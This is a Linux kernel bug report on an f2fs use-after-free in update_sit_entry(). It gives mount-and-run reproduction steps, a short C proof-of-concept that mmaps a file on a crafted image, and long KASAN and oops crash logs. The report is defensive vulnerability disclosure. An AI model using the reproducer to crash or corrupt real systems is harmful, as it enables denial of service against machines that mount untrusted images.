Bug 200179

Summary: use-after-free in update_sit_entry() when operating on a corrupted f2fs image
Product: File System Reporter: Wen Xu (wen.xu)
Component: f2fsAssignee: F2FS development list (linux-f2fs-devel)
Status: RESOLVED CODE_FIX    
Severity: normal CC: chao, wen.xu
Priority: P1    
Hardware: All   
OS: Linux   
Kernel Version: 4.18 Subsystem:
Regression: No Bisected commit-id:
Attachments: The (compressed) crafted image which causes crash

Description Wen Xu 2018-06-22 14:00:15 UTC
Created attachment 276739 [details]
The (compressed) crafted image which causes crash

- Overview
use-after-free in update_sit_entry() when operating on a corrupted f2fs image

- Reproduce (4.18 upstream kernel)
# mkdir mnt
# mount -t f2fs final.img
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

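/*
 * Open <mpoint>/foo/bar/baz read-only and map its first page, which is the
 * access pattern the report ties to the update_sit_entry() fault.
 *
 * mpoint: path of the mounted f2fs image; NULL is rejected.
 *
 * No return value: every user-space failure (allocation, open, mmap) is
 * ignored, since the effect of interest is on the kernel side. The original
 * reproducer left the asprintf() result unchecked and leaked the path
 * string; both are fixed here and the path is built with plain snprintf()
 * so no GNU extension is required.
 */
static void activity(const char *mpoint) {
  if (mpoint == NULL)
    return;

  /* Size the buffer first, then format into it. */
  int len = snprintf(NULL, 0, "%s/foo/bar/baz", mpoint);
  if (len < 0)
    return;

  size_t path_size = (size_t)len + 1;
  char *path = malloc(path_size);
  if (path == NULL)
    return;
  snprintf(path, path_size, "%s/foo/bar/baz", mpoint);

  int fd = open(path, O_RDONLY, 0);
  /* The path is only needed by open(); release it on every exit below. */
  free(path);
  if (fd < 0)
    return;

  /* Mapping flags and length are kept exactly as in the original report. */
  void *mem = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_POPULATE, fd, 0);
  if (mem != MAP_FAILED)
    munmap(mem, 4096);

  close(fd);
}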

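/*
 * Entry point: expects the f2fs mount point as argv[1].
 *
 * Returns 0 after running the reproducer, or 2 on a usage error. The
 * original passed argv[1] through unchecked, which is NULL when no argument
 * is given.
 */
int main(int argc, char *argv[]) {
  if (argc < 2) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return 2;
  }
  activity(argv[1]);
  return 0;
}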


- Kernel message
[  565.037249] F2FS-fs (loop0): Mounted with checkpoint version = 3
[  572.892317] ==================================================================
[  572.893980] BUG: KASAN: use-after-free in update_sit_entry+0x84/0x7d0
[  572.895296] Read of size 4 at addr ffff8801e1d49a40 by task a.out/1309

[  572.896974] CPU: 0 PID: 1309 Comm: a.out Not tainted 4.18.0-rc1+ #4
[  572.896977] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  572.896983] Call Trace:
[  572.897016]  dump_stack+0x7b/0xb5
[  572.897046]  print_address_description+0x70/0x290
[  572.897052]  kasan_report+0x291/0x390
[  572.897056]  ? update_sit_entry+0x84/0x7d0
[  572.897069]  __asan_load4+0x78/0x80
[  572.897074]  update_sit_entry+0x84/0x7d0
[  572.897084]  f2fs_allocate_data_block+0x69e/0xbc0
[  572.897091]  ? __radix_tree_lookup+0xb2/0x160
[  572.897097]  do_write_page+0xcd/0x140
[  572.897102]  f2fs_outplace_write_data+0x129/0x240
[  572.897106]  ? f2fs_do_write_node_page+0x180/0x180
[  572.897116]  ? inc_zone_page_state+0x58/0x100
[  572.897130]  ? unlock_page_memcg+0x2b/0x80
[  572.897150]  ? __test_set_page_writeback+0x333/0x5e0
[  572.897156]  f2fs_convert_inline_page+0x388/0x640
[  572.897161]  ? f2fs_read_inline_data+0x300/0x300
[  572.897167]  ? __get_node_page+0x331/0x5b0
[  572.897172]  f2fs_convert_inline_inode+0x36e/0x470
[  572.897176]  ? f2fs_convert_inline_page+0x640/0x640
[  572.897180]  ? kasan_kmalloc+0xad/0xe0
[  572.897191]  f2fs_file_mmap+0x7e/0xc0
[  572.897201]  mmap_region+0x5dc/0x8d0
[  572.897207]  do_mmap+0x543/0x790
[  572.897216]  vm_mmap_pgoff+0x182/0x1f0
[  572.897222]  ? vma_is_stack_for_current+0x60/0x60
[  572.897232]  ? putname+0x80/0x90
[  572.897246]  ? __fget+0xbe/0x110
[  572.897251]  ksys_mmap_pgoff+0x2a9/0x3a0
[  572.897264]  ? find_mergeable_anon_vma+0x60/0x60
[  572.897275]  ? filp_open+0x60/0x60
[  572.897279]  ? vm_brk+0x20/0x20
[  572.897303]  __x64_sys_mmap+0x94/0xb0
[  572.897318]  do_syscall_64+0x78/0x170
[  572.897333]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  572.897349] RIP: 0033:0x7fb2878e56ba
[  572.897351] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  572.897406] RSP: 002b:00007ffc524b5f78 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  572.897418] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb2878e56ba
[  572.897420] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  572.897423] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  572.897425] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  572.897427] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000

[  572.897774] Allocated by task 1144:
[  572.898511]  save_stack+0x46/0xd0
[  572.898514]  kasan_kmalloc+0xad/0xe0
[  572.898519]  __kmalloc+0x11f/0x240
[  572.898538]  sk_prot_alloc+0xa5/0x180
[  572.898549]  sk_alloc+0x31/0x350
[  572.898561]  __netlink_create+0x53/0x120
[  572.898565]  netlink_create+0x18b/0x350
[  572.898569]  __sock_create+0x13a/0x280
[  572.898573]  __sys_socket+0xc5/0x170
[  572.898577]  __x64_sys_socket+0x43/0x50
[  572.898581]  do_syscall_64+0x78/0x170
[  572.898585]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  572.898914] Freed by task 0:
[  572.899522]  save_stack+0x46/0xd0
[  572.899525]  __kasan_slab_free+0x13c/0x1a0
[  572.899529]  kasan_slab_free+0xe/0x10
[  572.899533]  kfree+0x8c/0x1c0
[  572.899536]  __sk_destruct+0x27e/0x280
[  572.899539]  sk_destruct+0x2d/0x40
[  572.899542]  __sk_free+0x53/0x120
[  572.899545]  sk_free+0x1e/0x20
[  572.899548]  deferred_put_nlk_sk+0x105/0x110
[  572.899568]  rcu_process_callbacks+0x2cb/0x850
[  572.899578]  __do_softirq+0x11d/0x341

[  572.899920] The buggy address belongs to the object at ffff8801e1d49980
                which belongs to the cache kmalloc-2048 of size 2048
[  572.902435] The buggy address is located 192 bytes inside of
                2048-byte region [ffff8801e1d49980, ffff8801e1d4a180)
[  572.904806] The buggy address belongs to the page:
[  572.905789] page:ffffea0007875200 count:1 mapcount:0 mapping:ffff8801f6802a80 index:0x0 compound_mapcount: 0
[  572.907784] flags: 0x2ffff0000008100(slab|head)
[  572.908716] raw: 02ffff0000008100 0000000000000000 0000000100000001 ffff8801f6802a80
[  572.910272] raw: 0000000000000000 00000000000f000f 00000001ffffffff 0000000000000000
[  572.911839] page dumped because: kasan: bad access detected

[  572.913299] Memory state around the buggy address:
[  572.914272]  ffff8801e1d49900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  572.915730]  ffff8801e1d49980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  572.917180] >ffff8801e1d49a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  572.918630]                                            ^
[  572.919721]  ffff8801e1d49a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  572.921176]  ffff8801e1d49b00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  572.922627] ==================================================================
[  572.924096] Disabling lock debugging due to kernel taint
[  572.924315] WARNING: CPU: 0 PID: 1309 at fs/f2fs/segment.c:1822 update_sit_entry+0x70b/0x7d0
[  572.924321] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  572.924814] CPU: 0 PID: 1309 Comm: a.out Tainted: G    B             4.18.0-rc1+ #4
[  572.924817] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  572.924823] RIP: 0010:update_sit_entry+0x70b/0x7d0
[  572.924824] Code: e9 5e fc ff ff 49 8d 7c 24 10 e8 c0 c6 ad ff 49 8b 5c 24 10 be 04 00 00 00 48 8d 7b 48 e8 8d ca ad ff 8b 5b 48 e9 60 fd ff ff <0f> 0b f0 41 80 4c 24 48 04 e9 d7 f9 ff ff 49 8d 7c 24 10 e8 8d c6
[  572.924878] RSP: 0018:ffff8801ed107778 EFLAGS: 00010286
[  572.924881] RAX: 0000000000000200 RBX: ffff8801e1d49a40 RCX: 0000000000000000
[  572.924884] RDX: ffffffffffffffff RSI: ffffffffffffffff RDI: ffff8801de23f29c
[  572.924887] RBP: ffff8801ed1077d0 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  572.924890] R10: 0000000000000001 R11: ffffed003edc3eba R12: ffff8801de23ee80
[  572.924892] R13: 0000000000000200 R14: 00000000ffffffff R15: ffff8801de23eee0
[  572.924896] FS:  00007fb287dc9700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  572.924899] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  572.924901] CR2: 00007fb2878db030 CR3: 00000001e4b08000 CR4: 00000000000006f0
[  572.924912] Call Trace:
[  572.924920]  f2fs_allocate_data_block+0x69e/0xbc0
[  572.924926]  ? __radix_tree_lookup+0xb2/0x160
[  572.924931]  do_write_page+0xcd/0x140
[  572.924936]  f2fs_outplace_write_data+0x129/0x240
[  572.924940]  ? f2fs_do_write_node_page+0x180/0x180
[  572.924945]  ? inc_zone_page_state+0x58/0x100
[  572.924949]  ? unlock_page_memcg+0x2b/0x80
[  572.924954]  ? __test_set_page_writeback+0x333/0x5e0
[  572.924959]  f2fs_convert_inline_page+0x388/0x640
[  572.924963]  ? f2fs_read_inline_data+0x300/0x300
[  572.924969]  ? __get_node_page+0x331/0x5b0
[  572.924974]  f2fs_convert_inline_inode+0x36e/0x470
[  572.924978]  ? f2fs_convert_inline_page+0x640/0x640
[  572.924982]  ? kasan_kmalloc+0xad/0xe0
[  572.924987]  f2fs_file_mmap+0x7e/0xc0
[  572.924991]  mmap_region+0x5dc/0x8d0
[  572.924996]  do_mmap+0x543/0x790
[  572.925002]  vm_mmap_pgoff+0x182/0x1f0
[  572.925008]  ? vma_is_stack_for_current+0x60/0x60
[  572.925012]  ? putname+0x80/0x90
[  572.925016]  ? __fget+0xbe/0x110
[  572.925021]  ksys_mmap_pgoff+0x2a9/0x3a0
[  572.925026]  ? find_mergeable_anon_vma+0x60/0x60
[  572.925030]  ? filp_open+0x60/0x60
[  572.925034]  ? vm_brk+0x20/0x20
[  572.925039]  __x64_sys_mmap+0x94/0xb0
[  572.925044]  do_syscall_64+0x78/0x170
[  572.925049]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  572.925052] RIP: 0033:0x7fb2878e56ba
[  572.925053] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  572.925157] RSP: 002b:00007ffc524b5f78 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  572.925176] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb2878e56ba
[  572.925178] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  572.925188] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  572.925197] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  572.925213] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  572.925226] ---[ end trace 4ce02f25ff7d3df5 ]---
[  572.925249] F2FS-fs (loop0): Bitmap was wrongly cleared, blk:196608
[  572.926570] WARNING: CPU: 0 PID: 1309 at fs/f2fs/segment.c:1874 update_sit_entry+0x7a7/0x7d0
[  572.926571] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  572.926633] CPU: 0 PID: 1309 Comm: a.out Tainted: G    B   W         4.18.0-rc1+ #4
[  572.926636] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  572.926642] RIP: 0010:update_sit_entry+0x7a7/0x7d0
[  572.926643] Code: 00 00 00 e9 53 fa ff ff 4c 89 e7 e8 23 c6 ad ff 8b 4d c8 49 8b 3c 24 48 c7 c2 40 f3 9b b9 48 c7 c6 00 f3 9b b9 e8 f9 de fc ff <0f> 0b f0 41 80 4c 24 48 04 48 89 df 45 31 f6 e8 f5 c4 ad ff 66 83
[  572.926696] RSP: 0018:ffff8801ed107778 EFLAGS: 00010286
[  572.926700] RAX: 0000000000000000 RBX: ffff8801e1d49a40 RCX: 0000000000000000
[  572.926703] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003da20ec5
[  572.926705] RBP: ffff8801ed1077d0 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  572.926708] R10: 0000000000000001 R11: ffffed003edc3eba R12: ffff8801de23ee80
[  572.926710] R13: 0000000000000000 R14: 00000000ffffffff R15: ffff8801de23eee0
[  572.926714] FS:  00007fb287dc9700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  572.926716] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  572.926719] CR2: 00007fb2878db030 CR3: 00000001e4b08000 CR4: 00000000000006f0
[  572.926723] Call Trace:
[  572.926730]  f2fs_allocate_data_block+0x69e/0xbc0
[  572.926735]  ? __radix_tree_lookup+0xb2/0x160
[  572.926741]  do_write_page+0xcd/0x140
[  572.926746]  f2fs_outplace_write_data+0x129/0x240
[  572.926750]  ? f2fs_do_write_node_page+0x180/0x180
[  572.926755]  ? inc_zone_page_state+0x58/0x100
[  572.926759]  ? unlock_page_memcg+0x2b/0x80
[  572.926764]  ? __test_set_page_writeback+0x333/0x5e0
[  572.926769]  f2fs_convert_inline_page+0x388/0x640
[  572.926773]  ? f2fs_read_inline_data+0x300/0x300
[  572.926779]  ? __get_node_page+0x331/0x5b0
[  572.926784]  f2fs_convert_inline_inode+0x36e/0x470
[  572.926788]  ? f2fs_convert_inline_page+0x640/0x640
[  572.926792]  ? kasan_kmalloc+0xad/0xe0
[  572.926797]  f2fs_file_mmap+0x7e/0xc0
[  572.926801]  mmap_region+0x5dc/0x8d0
[  572.926806]  do_mmap+0x543/0x790
[  572.926812]  vm_mmap_pgoff+0x182/0x1f0
[  572.926818]  ? vma_is_stack_for_current+0x60/0x60
[  572.926822]  ? putname+0x80/0x90
[  572.926826]  ? __fget+0xbe/0x110
[  572.926831]  ksys_mmap_pgoff+0x2a9/0x3a0
[  572.926836]  ? find_mergeable_anon_vma+0x60/0x60
[  572.926840]  ? filp_open+0x60/0x60
[  572.926844]  ? vm_brk+0x20/0x20
[  572.926849]  __x64_sys_mmap+0x94/0xb0
[  572.926854]  do_syscall_64+0x78/0x170
[  572.926859]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  572.926862] RIP: 0033:0x7fb2878e56ba
[  572.926863] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  572.926916] RSP: 002b:00007ffc524b5f78 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  572.926921] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb2878e56ba
[  572.926923] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  572.926925] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  572.926927] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  572.926929] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  572.926933] ---[ end trace 4ce02f25ff7d3df6 ]---
[  572.926987] BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
[  572.928598] PGD 80000001e0ac9067 P4D 80000001e0ac9067 PUD 1e17c9067 PMD 0
[  572.929980] Oops: 0000 [#1] SMP KASAN PTI
[  572.930796] CPU: 0 PID: 1309 Comm: a.out Tainted: G    B   W         4.18.0-rc1+ #4
[  572.932439] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  572.934980] RIP: 0010:update_sit_entry+0x61a/0x7d0
[  572.936345] Code: 00 f6 c4 08 74 51 48 8d 7b 18 e8 b1 c7 ad ff 4c 89 e9 48 03 4b 18 48 89 cf 48 89 4d c8 e8 fe c4 ad ff 48 8b 4d c8 0f b6 45 ab <0f> be 11 21 d0 88 01 8b 45 d0 85 d0 74 75 49 8d bc 24 54 04 00 00
[  572.940671] RSP: 0018:ffff8801ed107778 EFLAGS: 00010282
[  572.941747] RAX: 000000000000007f RBX: ffff8801e1d49a40 RCX: 0000000000000000
[  572.943185] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[  572.944678] RBP: ffff8801ed1077d0 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  572.946129] R10: 0000000000000001 R11: ffffed003edc3eba R12: ffff8801de23ee80
[  572.947541] R13: 0000000000000000 R14: 0000000000000000 R15: ffff8801de23eee0
[  572.948973] FS:  00007fb287dc9700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  572.950574] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  572.951729] CR2: 0000000000000000 CR3: 00000001e4b08000 CR4: 00000000000006f0
[  572.953145] Call Trace:
[  572.953657]  f2fs_allocate_data_block+0x69e/0xbc0
[  572.954609]  ? __radix_tree_lookup+0xb2/0x160
[  572.955492]  do_write_page+0xcd/0x140
[  572.956253]  f2fs_outplace_write_data+0x129/0x240
[  572.957208]  ? f2fs_do_write_node_page+0x180/0x180
[  572.958176]  ? inc_zone_page_state+0x58/0x100
[  572.959059]  ? unlock_page_memcg+0x2b/0x80
[  572.959908]  ? __test_set_page_writeback+0x333/0x5e0
[  572.960916]  f2fs_convert_inline_page+0x388/0x640
[  572.961876]  ? f2fs_read_inline_data+0x300/0x300
[  572.962817]  ? __get_node_page+0x331/0x5b0
[  572.978799]  f2fs_convert_inline_inode+0x36e/0x470
[  572.979797]  ? f2fs_convert_inline_page+0x640/0x640
[  572.980788]  ? kasan_kmalloc+0xad/0xe0
[  572.981552]  f2fs_file_mmap+0x7e/0xc0
[  572.982301]  mmap_region+0x5dc/0x8d0
[  572.983031]  do_mmap+0x543/0x790
[  572.983710]  vm_mmap_pgoff+0x182/0x1f0
[  572.984480]  ? vma_is_stack_for_current+0x60/0x60
[  572.985434]  ? putname+0x80/0x90
[  572.986102]  ? __fget+0xbe/0x110
[  572.986763]  ksys_mmap_pgoff+0x2a9/0x3a0
[  572.987566]  ? find_mergeable_anon_vma+0x60/0x60
[  572.988509]  ? filp_open+0x60/0x60
[  572.989205]  ? vm_brk+0x20/0x20
[  572.989851]  __x64_sys_mmap+0x94/0xb0
[  572.990601]  do_syscall_64+0x78/0x170
[  572.991349]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  572.992375] RIP: 0033:0x7fb2878e56ba
[  572.993096] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  572.996863] RSP: 002b:00007ffc524b5f78 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  572.998369] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb2878e56ba
[  572.999799] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  573.001211] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  573.002626] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  573.004050] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  573.005471] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  573.014836] CR2: 0000000000000000
[  573.015637] ---[ end trace 4ce02f25ff7d3df7 ]---
[  573.016629] RIP: 0010:update_sit_entry+0x61a/0x7d0
[  573.017610] Code: 00 f6 c4 08 74 51 48 8d 7b 18 e8 b1 c7 ad ff 4c 89 e9 48 03 4b 18 48 89 cf 48 89 4d c8 e8 fe c4 ad ff 48 8b 4d c8 0f b6 45 ab <0f> be 11 21 d0 88 01 8b 45 d0 85 d0 74 75 49 8d bc 24 54 04 00 00
[  573.021441] RSP: 0018:ffff8801ed107778 EFLAGS: 00010282
[  573.022492] RAX: 000000000000007f RBX: ffff8801e1d49a40 RCX: 0000000000000000
[  573.023950] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[  573.025397] RBP: ffff8801ed1077d0 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  573.026817] R10: 0000000000000001 R11: ffffed003edc3eba R12: ffff8801de23ee80
[  573.028310] R13: 0000000000000000 R14: 0000000000000000 R15: ffff8801de23eee0
[  573.029747] FS:  00007fb287dc9700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  573.031356] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  573.032555] CR2: 0000000000000000 CR3: 00000001e4b08000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/latest/source/fs/f2fs/segment.c#L1828
	se = get_seg_entry(sbi, segno);
According to the KASAN report, `se` is used after it has been freed.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
Comment 1 Wen Xu 2018-06-29 15:46:02 UTC
On the f2fs-dev tree:

# mkdir mnt
# mount -t f2fs final.img
# gcc -o poc poc.c
# ./poc ./mnt

The kernel still reports the following panic:

[ 1424.571209] F2FS-fs (loop0): Mounted with checkpoint version = 3
[ 1428.840765] F2FS-fs (loop0): access invalid blkaddr:196608
[ 1428.840833] WARNING: CPU: 0 PID: 2741 at fs/f2fs/checkpoint.c:151 f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.840835] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.840935] CPU: 0 PID: 2741 Comm: a.out Not tainted 4.17.0+ #1
[ 1428.840939] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.840945] RIP: 0010:f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.840946] Code: 85 e5 fe ff ff 48 89 df 88 44 24 07 e8 20 4b da ff 48 8b 3b 44 89 e1 48 c7 c2 00 f9 57 a5 48 c7 c6 a0 f7 57 a5 e8 47 44 ff ff <0f> 0b 0f b6 44 24 07 e9 b4 fe ff ff 48 8d 7f 60 e8 f2 4a da ff 48 
[ 1428.841006] RSP: 0018:ffff8801ea2d78f0 EFLAGS: 00010286
[ 1428.841011] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.841014] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aef4
[ 1428.841018] RBP: 0000000000000005 R08: ffffed003e744f21 R09: ffffed003e744f21
[ 1428.841021] R10: 0000000000000001 R11: ffffed003e744f20 R12: 0000000000030000
[ 1428.841024] R13: ffff8801ee1be600 R14: 0000000000004000 R15: 0000000000003e00
[ 1428.841029] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.841033] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.841036] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.841044] Call Trace:
[ 1428.841055]  f2fs_iget+0xcd8/0x1a80
[ 1428.841064]  ? f2fs_lookup+0x2e7/0x580
[ 1428.841068]  f2fs_lookup+0x2e7/0x580
[ 1428.841074]  ? __recover_dot_dentries+0x400/0x400
[ 1428.841080]  ? __recover_dot_dentries+0x400/0x400
[ 1428.841089]  path_openat+0x1b15/0x1fa0
[ 1428.841097]  ? vfs_unlink+0x250/0x250
[ 1428.841105]  ? save_stack+0x94/0xb0
[ 1428.841111]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.841119]  ? kmem_cache_alloc+0xc8/0x1e0
[ 1428.841124]  ? getname_flags+0x73/0x2b0
[ 1428.841132]  ? do_sys_open+0x144/0x2a0
[ 1428.841141]  ? do_syscall_64+0x73/0x160
[ 1428.841152]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.841165]  ? __alloc_pages_slowpath+0x1260/0x1260
[ 1428.841171]  ? policy_nodemask+0x1a/0x90
[ 1428.841175]  ? policy_node+0x56/0x70
[ 1428.841184]  ? __mod_node_page_state+0x22/0xa0
[ 1428.841195]  ? __handle_mm_fault+0x119a/0x1920
[ 1428.841201]  do_filp_open+0x12b/0x1d0
[ 1428.841206]  ? may_open_dev+0x50/0x50
[ 1428.841212]  ? getname_flags+0x73/0x2b0
[ 1428.841217]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.841222]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.841232]  ? __alloc_fd+0x1b0/0x250
[ 1428.841238]  ? do_sys_open+0x175/0x2a0
[ 1428.841243]  do_sys_open+0x175/0x2a0
[ 1428.841249]  ? filp_open+0x50/0x50
[ 1428.841256]  do_syscall_64+0x73/0x160
[ 1428.841263]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.841268] RIP: 0033:0x7fb14306c040
[ 1428.841269] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 83 3d 09 27 2d 00 00 75 10 b8 02 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 7e e0 01 00 48 89 04 24 
[ 1428.841329] RSP: 002b:00007ffc651d93b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000002
[ 1428.841334] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fb14306c040
[ 1428.841337] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000002229080
[ 1428.841340] RBP: 00007ffc651d93f0 R08: 0000000002229010 R09: 0000000000000000
[ 1428.841343] R10: 000000000000069d R11: 0000000000000246 R12: 00000000004005c0
[ 1428.841347] R13: 00007ffc651d94f0 R14: 0000000000000000 R15: 0000000000000000
